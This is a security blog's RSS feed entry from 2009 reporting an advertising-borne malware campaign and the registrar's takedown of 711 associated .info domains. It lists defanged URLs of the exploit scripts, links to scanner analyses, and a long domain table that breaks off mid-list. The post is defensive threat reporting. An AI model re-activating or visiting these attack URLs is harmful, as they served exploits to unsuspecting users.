<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Andrew Martin &#187; Malware scripts and other formats</title>
	<atom:link href="http://www.martinsecurity.net/category/malware-scripts-and-other-formats/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.martinsecurity.net</link>
	<description>Viewing InfoSec from the trenches (formerly Real Security)</description>
	<lastBuildDate>Fri, 18 Dec 2009 19:29:17 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=</generator>
		<item>
		<title>Major Stealthy Malware Campaign &#8211; 711 Domains Taken Down</title>
		<link>http://www.martinsecurity.net/2009/12/08/major-stealthy-malware-campaign-711-domains-taken-down/</link>
		<comments>http://www.martinsecurity.net/2009/12/08/major-stealthy-malware-campaign-711-domains-taken-down/#comments</comments>
		<pubDate>Tue, 08 Dec 2009 21:52:18 +0000</pubDate>
		<dc:creator>martinse</dc:creator>
				<category><![CDATA[Intelligence]]></category>
		<category><![CDATA[Intrusion Detection]]></category>
		<category><![CDATA[Malware Binaries (exe/dll)]]></category>
		<category><![CDATA[Malware scripts and other formats]]></category>
		<category><![CDATA[malware]]></category>

		<guid isPermaLink="false">http://www.martinsecurity.net/?p=427</guid>
		<description><![CDATA[Starting sometime around November 6th, many attacks were observed coming from strangely named domains such as us.bf9.info, us.bp0.info, us.bn3.info, etc. The attackers employed some code splitting techniques to make their scripts more stealthy by moving suspicious shellcode from inside the primary exploit script to a secondary script. The attacks were being delivered through advertisements which [...]]]></description>
			<content:encoded><![CDATA[<p>Starting sometime around November 6th, many attacks were observed coming from strangely named domains such as us.bf9.info, us.bp0.info, us.bn3.info, etc. The attackers employed some code splitting techniques to make their scripts more stealthy by moving suspicious shellcode from inside the primary exploit script to a secondary script. The attacks were being delivered through advertisements which also made investigating the source a pain. Performing some searches on the domains strangely did not yield any information from common sources such as malwareurl, malwaredomainlist, McAfee Site Adviser, etc.</p>
<p>To get to the root of the problem, Afilias (the company responsible for .info domains) and GoDaddy (the registrar) were involved to investigate. They quickly blocked the offending domains once it was clear they were hostile. What was very surprising was the end result, GoDaddy removed 711 domains that were affiliated with this attack!</p>
<p>Attack scripts:</p>
<p>hxxp://us.hn0.info/f/1/ie.html</p>
<p><a title="blocked::http://www.virustotal.com/analisis/a53300db52ccf8a236348995c0480aed05fa4419d1eb5c471808a6ae2fd0d9b6-1259947372" href="http://www.virustotal.com/analisis/a53300db52ccf8a236348995c0480aed05fa4419d1eb5c471808a6ae2fd0d9b6-1259947372">http://www.virustotal.com/analisis/a53300db52ccf8a236348995c0480aed05fa4419d1eb5c471808a6ae2fd0d9b6-1259947372</a></p>
<p>hxxp://us.hn0.info/f/1/ff.html</p>
<p><a title="blocked::http://www.virustotal.com/analisis/1d3778247739c072cb435e3b11a0592503cb71f6a03cce24af85ca20ba110f00-1259947360" href="http://www.virustotal.com/analisis/1d3778247739c072cb435e3b11a0592503cb71f6a03cce24af85ca20ba110f00-1259947360">http://www.virustotal.com/analisis/1d3778247739c072cb435e3b11a0592503cb71f6a03cce24af85ca20ba110f00-1259947360</a></p>
<p>hxxp://us.hn0.info/f/1/cosplay.swf<br />
<a title="blocked::http://wepawet.iseclab.org/view.php?hash=8e2a2167a9f34c1c0b9d7ac456aff807&amp;type=swf" href="http://wepawet.iseclab.org/view.php?hash=8e2a2167a9f34c1c0b9d7ac456aff807&amp;type=swf">http://wepawet.iseclab.org/view.php?hash=8e2a2167a9f34c1c0b9d7ac456aff807&amp;type=swf</a></p>
<p>Shellcode:<br />
<a title="blocked::http://www.virustotal.com/analisis/71d15b19cc00d4ddb8cd9152f071671abe398fb6da7b0517b1d6a0e0c3e61995-1259948262" href="http://www.virustotal.com/analisis/71d15b19cc00d4ddb8cd9152f071671abe398fb6da7b0517b1d6a0e0c3e61995-1259948262">http://www.virustotal.com/analisis/71d15b19cc00d4ddb8cd9152f071671abe398fb6da7b0517b1d6a0e0c3e61995-1259948262</a></p>
<p>The domains:</p>
<table style="border-collapse: collapse; width: 271pt;" border="0" cellspacing="0" cellpadding="0" width="361">
<col style="width: 55pt;" width="73"></col>
<col style="width: 108pt;" width="144"></col>
<col style="width: 60pt;" width="80"></col>
<col style="width: 48pt;" width="64"></col>
<tbody>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt; width: 55pt;" width="73" height="20">FK0.INFO<span> </span></td>
<td style="width: 108pt;" width="144">AC0.INFO<span> </span></td>
<td style="width: 60pt;" width="80">KD8.INFO<span> </span></td>
<td style="width: 48pt;" width="64">JZ5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FK6.INFO<span> </span></td>
<td>AE0.INFO<span> </span></td>
<td>KD9.INFO<span> </span></td>
<td>JZ6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FK7.INFO<span> </span></td>
<td>AE6.INFO<span> </span></td>
<td>CUUB.INFO<span> </span></td>
<td>JZ7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FK8.INFO<span> </span></td>
<td>AE9.INFO<span> </span></td>
<td>CXXB.INFO<span> </span></td>
<td>JZ8.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FK9.INFO<span> </span></td>
<td>AF0.INFO<span> </span></td>
<td>DRRB.INFO<span> </span></td>
<td>KA0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FL0.INFO<span> </span></td>
<td>AF5.INFO<span> </span></td>
<td>DTTB.INFO<span> </span></td>
<td>KB0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FL7.INFO<span> </span></td>
<td>AF8.INFO<span> </span></td>
<td>DYYB.INFO<span> </span></td>
<td>KB8.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FL8.INFO<span> </span></td>
<td>AF9.INFO<span> </span></td>
<td>GJGJ.INFO<span> </span></td>
<td>KC5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FM0.INFO<span> </span></td>
<td>AG0.INFO<span> </span></td>
<td>RFVT.INFO<span> </span></td>
<td>KC6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FM9.INFO<span> </span></td>
<td>AG7.INFO<span> </span></td>
<td>TGBY.INFO<span> </span></td>
<td>KC8.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FN3.INFO<span> </span></td>
<td>AG8.INFO<span> </span></td>
<td>UJMI.INFO<span> </span></td>
<td>KD3.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FN4.INFO<span> </span></td>
<td>AG9.INFO<span> </span></td>
<td>YHNU.INFO<span> </span></td>
<td>KD4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FN5.INFO<span> </span></td>
<td>AH0.INFO<span> </span></td>
<td>DT0.INFO<span> </span></td>
<td>KD7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FN6.INFO<span> </span></td>
<td>AH5.INFO<span> </span></td>
<td>DV0.INFO<span> </span></td>
<td>HX0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FN7.INFO<span> </span></td>
<td>AH7.INFO<span> </span></td>
<td>DV6.INFO<span> </span></td>
<td>HY2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FN8.INFO<span> </span></td>
<td>AI0.INFO<span> </span></td>
<td>DV7.INFO<span> </span></td>
<td>HY3.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FO0.INFO<span> </span></td>
<td>AJ3.INFO<span> </span></td>
<td>DW0.INFO<span> </span></td>
<td>HY6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FO5.INFO<span> </span></td>
<td>AJ4.INFO<span> </span></td>
<td>DW9.INFO<span> </span></td>
<td>HY7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FO6.INFO<span> </span></td>
<td>AJ5.INFO<span> </span></td>
<td>DX6.INFO<span> </span></td>
<td>HZ0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FO7.INFO<span> </span></td>
<td>AJ7.INFO<span> </span></td>
<td>DX7.INFO<span> </span></td>
<td>HZ3.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FP4.INFO<span> </span></td>
<td>AJ9.INFO<span> </span></td>
<td>DX8.INFO<span> </span></td>
<td>HZ4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FP5.INFO<span> </span></td>
<td>AK0.INFO<span> </span></td>
<td>DY2.INFO<span> </span></td>
<td>HZ5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FP9.INFO<span> </span></td>
<td>AN0.INFO<span> </span></td>
<td>DY5.INFO<span> </span></td>
<td>HZ7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FQ0.INFO<span> </span></td>
<td>AO0.INFO<span> </span></td>
<td>DZ4.INFO<span> </span></td>
<td>HZ8.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FQ3.INFO<span> </span></td>
<td>AO3.INFO<span> </span></td>
<td>DZ5.INFO<span> </span></td>
<td>IA0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FQ4.INFO<span> </span></td>
<td>AO8.INFO<span> </span></td>
<td>EA0.INFO<span> </span></td>
<td>IB0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FQ6.INFO<span> </span></td>
<td>AP3.INFO<span> </span></td>
<td>EA2.INFO<span> </span></td>
<td>IB4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FQ7.INFO<span> </span></td>
<td>AP9.INFO<span> </span></td>
<td>EA4.INFO<span> </span></td>
<td>IB5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FR0.INFO<span> </span></td>
<td>AQ0.INFO<span> </span></td>
<td>EA5.INFO<span> </span></td>
<td>IB6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FS0.INFO<span> </span></td>
<td>AQ3.INFO<span> </span></td>
<td>EA6.INFO<span> </span></td>
<td>IB7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FS4.INFO<span> </span></td>
<td>AQ9.INFO<span> </span></td>
<td>EA7.INFO<span> </span></td>
<td>IB8.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FS6.INFO<span> </span></td>
<td>AR0.INFO<span> </span></td>
<td>EA8.INFO<span> </span></td>
<td>IB9.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FS7.INFO<span> </span></td>
<td>AT4.INFO<span> </span></td>
<td>EB0.INFO<span> </span></td>
<td>IC5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FT0.INFO<span> </span></td>
<td>AU0.INFO<span> </span></td>
<td>EB4.INFO<span> </span></td>
<td>IF4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FT5.INFO<span> </span></td>
<td>AW0.INFO<span> </span></td>
<td>ED0.INFO<span> </span></td>
<td>IF5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FT9.INFO<span> </span></td>
<td>AX0.INFO<span> </span></td>
<td>ED3.INFO<span> </span></td>
<td>IF6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FU0.INFO<span> </span></td>
<td>AX3.INFO<span> </span></td>
<td>EF2.INFO<span> </span></td>
<td>IF7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FU4.INFO<span> </span></td>
<td>AY0.INFO<span> </span></td>
<td>EH4.INFO<span> </span></td>
<td>IF8.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FU8.INFO<span> </span></td>
<td>AZ5.INFO<span> </span></td>
<td>EH7.INFO<span> </span></td>
<td>IF9.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FV4.INFO<span> </span></td>
<td>AZ6.INFO<span> </span></td>
<td>EI4.INFO<span> </span></td>
<td>IG5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FV6.INFO<span> </span></td>
<td>AZ7.INFO<span> </span></td>
<td>EI5.INFO<span> </span></td>
<td>IG6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FV7.INFO<span> </span></td>
<td>AZ8.INFO<span> </span></td>
<td>EI6.INFO<span> </span></td>
<td>IG9.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FV8.INFO<span> </span></td>
<td>AZ9.INFO<span> </span></td>
<td>EI8.INFO<span> </span></td>
<td>IH0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FV9.INFO<span> </span></td>
<td>BC0.INFO<span> </span></td>
<td>EI9.INFO<span> </span></td>
<td>IH2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FW0.INFO<span> </span></td>
<td>BC6.INFO<span> </span></td>
<td>EK0.INFO<span> </span></td>
<td>IH3.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FW5.INFO<span> </span></td>
<td>BC8.INFO<span> </span></td>
<td>EK2.INFO<span> </span></td>
<td>IH4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FW6.INFO<span> </span></td>
<td>BC9.INFO<span> </span></td>
<td>EK4.INFO<span> </span></td>
<td>IH5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FW8.INFO<span> </span></td>
<td>BD3.INFO<span> </span></td>
<td>EK5.INFO<span> </span></td>
<td>IH6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FW9.INFO<span> </span></td>
<td>BF0.INFO<span> </span></td>
<td>EK7.INFO<span> </span></td>
<td>IJ2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FY0.INFO<span> </span></td>
<td>BF4.INFO<span> </span></td>
<td>EL0.INFO<span> </span></td>
<td>IJ4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FY2.INFO<span> </span></td>
<td>BF6.INFO<span> </span></td>
<td>EL6.INFO<span> </span></td>
<td>IJ5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FY5.INFO<span> </span></td>
<td>BF8.INFO<span> </span></td>
<td>EM5.INFO<span> </span></td>
<td>IJ6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FY6.INFO<span> </span></td>
<td>BF9.INFO<span> </span></td>
<td>EM8.INFO<span> </span></td>
<td>IJ7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FZ0.INFO<span> </span></td>
<td>BG0.INFO<span> </span></td>
<td>EM9.INFO<span> </span></td>
<td>IK3.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FZ3.INFO<span> </span></td>
<td>BH0.INFO<span> </span></td>
<td>EN8.INFO<span> </span></td>
<td>IK4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FZ4.INFO<span> </span></td>
<td>BH2.INFO<span> </span></td>
<td>EO0.INFO<span> </span></td>
<td>IK5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FZ5.INFO<span> </span></td>
<td>BI6.INFO<span> </span></td>
<td>EO3.INFO<span> </span></td>
<td>IK6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FZ7.INFO<span> </span></td>
<td>BI7.INFO<span> </span></td>
<td>EO5.INFO<span> </span></td>
<td>IK7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">FZ8.INFO<span> </span></td>
<td>BJ4.INFO<span> </span></td>
<td>EO6.INFO<span> </span></td>
<td>IK8.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GB0.INFO<span> </span></td>
<td>BK2.INFO<span> </span></td>
<td>EO7.INFO<span> </span></td>
<td>IK9.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GC0.INFO<span> </span></td>
<td>BL0.INFO<span> </span></td>
<td>EO8.INFO<span> </span></td>
<td>IL0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GC6.INFO<span> </span></td>
<td>BL8.INFO<span> </span></td>
<td>EO9.INFO<span> </span></td>
<td>IL7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GC7.INFO<span> </span></td>
<td>BL9.INFO<span> </span></td>
<td>EP6.INFO<span> </span></td>
<td>IL8.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GC8.INFO<span> </span></td>
<td>BM3.INFO<span> </span></td>
<td>EP7.INFO<span> </span></td>
<td>IO2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GC9.INFO<span> </span></td>
<td>BM5.INFO<span> </span></td>
<td>EP8.INFO<span> </span></td>
<td>IO3.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GD0.INFO<span> </span></td>
<td>BM8.INFO<span> </span></td>
<td>EQ4.INFO<span> </span></td>
<td>IO5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GD4.INFO<span> </span></td>
<td>BN0.INFO<span> </span></td>
<td>EQ7.INFO<span> </span></td>
<td>IO6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GD5.INFO<span> </span></td>
<td>BN3.INFO<span> </span></td>
<td>ER9.INFO<span> </span></td>
<td>IQ9.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GD6.INFO<span> </span></td>
<td>BN5.INFO<span> </span></td>
<td>ES7.INFO<span> </span></td>
<td>IR0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GD7.INFO<span> </span></td>
<td>BN7.INFO<span> </span></td>
<td>ES8.INFO<span> </span></td>
<td>IR6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GD8.INFO<span> </span></td>
<td>BN8.INFO<span> </span></td>
<td>ES9.INFO<span> </span></td>
<td>IR7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GF3.INFO<span> </span></td>
<td>BP0.INFO<span> </span></td>
<td>EU0.INFO<span> </span></td>
<td>IR9.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GH4.INFO<span> </span></td>
<td>BP5.INFO<span> </span></td>
<td>EV9.INFO<span> </span></td>
<td>IU0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GH5.INFO<span> </span></td>
<td>BP6.INFO<span> </span></td>
<td>EW0.INFO<span> </span></td>
<td>IU2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GH6.INFO<span> </span></td>
<td>BP7.INFO<span> </span></td>
<td>EW4.INFO<span> </span></td>
<td>IV2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GH7.INFO<span> </span></td>
<td>BP8.INFO<span> </span></td>
<td>EY0.INFO<span> </span></td>
<td>IV4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GI0.INFO<span> </span></td>
<td>BQ0.INFO<span> </span></td>
<td>EZ0.INFO<span> </span></td>
<td>IV5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GI3.INFO<span> </span></td>
<td>BQ2.INFO<span> </span></td>
<td>EZ9.INFO<span> </span></td>
<td>IV6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GI6.INFO<span> </span></td>
<td>BQ3.INFO<span> </span></td>
<td>FA0.INFO<span> </span></td>
<td>IW0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GI8.INFO<span> </span></td>
<td>BQ4.INFO<span> </span></td>
<td>FC0.INFO<span> </span></td>
<td>IW2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GJ0.INFO<span> </span></td>
<td>BQ5.INFO<span> </span></td>
<td>FC5.INFO<span> </span></td>
<td>IW4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GJ7.INFO<span> </span></td>
<td>BQ6.INFO<span> </span></td>
<td>FC7.INFO<span> </span></td>
<td>IW5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GJ8.INFO<span> </span></td>
<td>BQ7.INFO<span> </span></td>
<td>FC9.INFO<span> </span></td>
<td>IW6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GJ9.INFO<span> </span></td>
<td>BQ8.INFO<span> </span></td>
<td>FD0.INFO<span> </span></td>
<td>IX4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GK0.INFO<span> </span></td>
<td>BQ9.INFO<span> </span></td>
<td>FD5.INFO<span> </span></td>
<td>IX5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GK3.INFO<span> </span></td>
<td>BR5.INFO<span> </span></td>
<td>FD8.INFO<span> </span></td>
<td>IX6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GK5.INFO<span> </span></td>
<td>BR6.INFO<span> </span></td>
<td>FD9.INFO<span> </span></td>
<td>IX7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GK6.INFO<span> </span></td>
<td>BR7.INFO<span> </span></td>
<td>FE0.INFO<span> </span></td>
<td>IY0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GK8.INFO<span> </span></td>
<td>BR9.INFO<span> </span></td>
<td>FE4.INFO<span> </span></td>
<td>IY2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GL3.INFO<span> </span></td>
<td>BS3.INFO<span> </span></td>
<td>FE7.INFO<span> </span></td>
<td>IY3.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GL4.INFO<span> </span></td>
<td>BS5.INFO<span> </span></td>
<td>FG0.INFO<span> </span></td>
<td>IY4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GL9.INFO<span> </span></td>
<td>BT0.INFO<span> </span></td>
<td>FG3.INFO<span> </span></td>
<td>IY6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GM8.INFO<span> </span></td>
<td>BU0.INFO<span> </span></td>
<td>FG5.INFO<span> </span></td>
<td>IY8.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GM9.INFO<span> </span></td>
<td>BU9.INFO<span> </span></td>
<td>FG8.INFO<span> </span></td>
<td>IY9.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GN0.INFO<span> </span></td>
<td>BV0.INFO<span> </span></td>
<td>FH0.INFO<span> </span></td>
<td>IZ0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GN5.INFO<span> </span></td>
<td>BV2.INFO<span> </span></td>
<td>FH4.INFO<span> </span></td>
<td>IZ2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GN6.INFO<span> </span></td>
<td>BV5.INFO<span> </span></td>
<td>FH5.INFO<span> </span></td>
<td>IZ3.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GN7.INFO<span> </span></td>
<td>BV7.INFO<span> </span></td>
<td>FH6.INFO<span> </span></td>
<td>IZ7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GN9.INFO<span> </span></td>
<td>BV8.INFO<span> </span></td>
<td>FH7.INFO<span> </span></td>
<td>IZ8.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GP8.INFO<span> </span></td>
<td>BV9.INFO<span> </span></td>
<td>FH8.INFO<span> </span></td>
<td>IZ9.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">BX2.INFO<span> </span></td>
<td>WGREATDREAM.COM<span> </span></td>
<td>FH9.INFO<span> </span></td>
<td>JA0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">BX7.INFO<span> </span></td>
<td>GP0.INFO<span> </span></td>
<td>FI4.INFO<span> </span></td>
<td>JB0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">BX9.INFO<span> </span></td>
<td>GQ0.INFO<span> </span></td>
<td>FJ0.INFO<span> </span></td>
<td>JC2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">BY5.INFO<span> </span></td>
<td>GQ2.INFO<span> </span></td>
<td>FJ2.INFO<span> </span></td>
<td>JC5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">BZ9.INFO<span> </span></td>
<td>GQ3.INFO<span> </span></td>
<td>FJ3.INFO<span> </span></td>
<td>JC6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CB0.INFO<span> </span></td>
<td>GQ4.INFO<span> </span></td>
<td>FJ4.INFO<span> </span></td>
<td>JD2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CB6.INFO<span> </span></td>
<td>GQ5.INFO<span> </span></td>
<td>FJ5.INFO<span> </span></td>
<td>JD3.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CE3.INFO<span> </span></td>
<td>GQ9.INFO<span> </span></td>
<td>FJ6.INFO<span> </span></td>
<td>JD4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CE7.INFO<span> </span></td>
<td>GR6.INFO<span> </span></td>
<td>FJ7.INFO<span> </span></td>
<td>KE2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CF0.INFO<span> </span></td>
<td>GR9.INFO<span> </span></td>
<td>FJ8.INFO<span> </span></td>
<td>KF3.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CF3.INFO<span> </span></td>
<td>GS0.INFO<span> </span></td>
<td>FJ9.INFO<span> </span></td>
<td>KF4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CF4.INFO<span> </span></td>
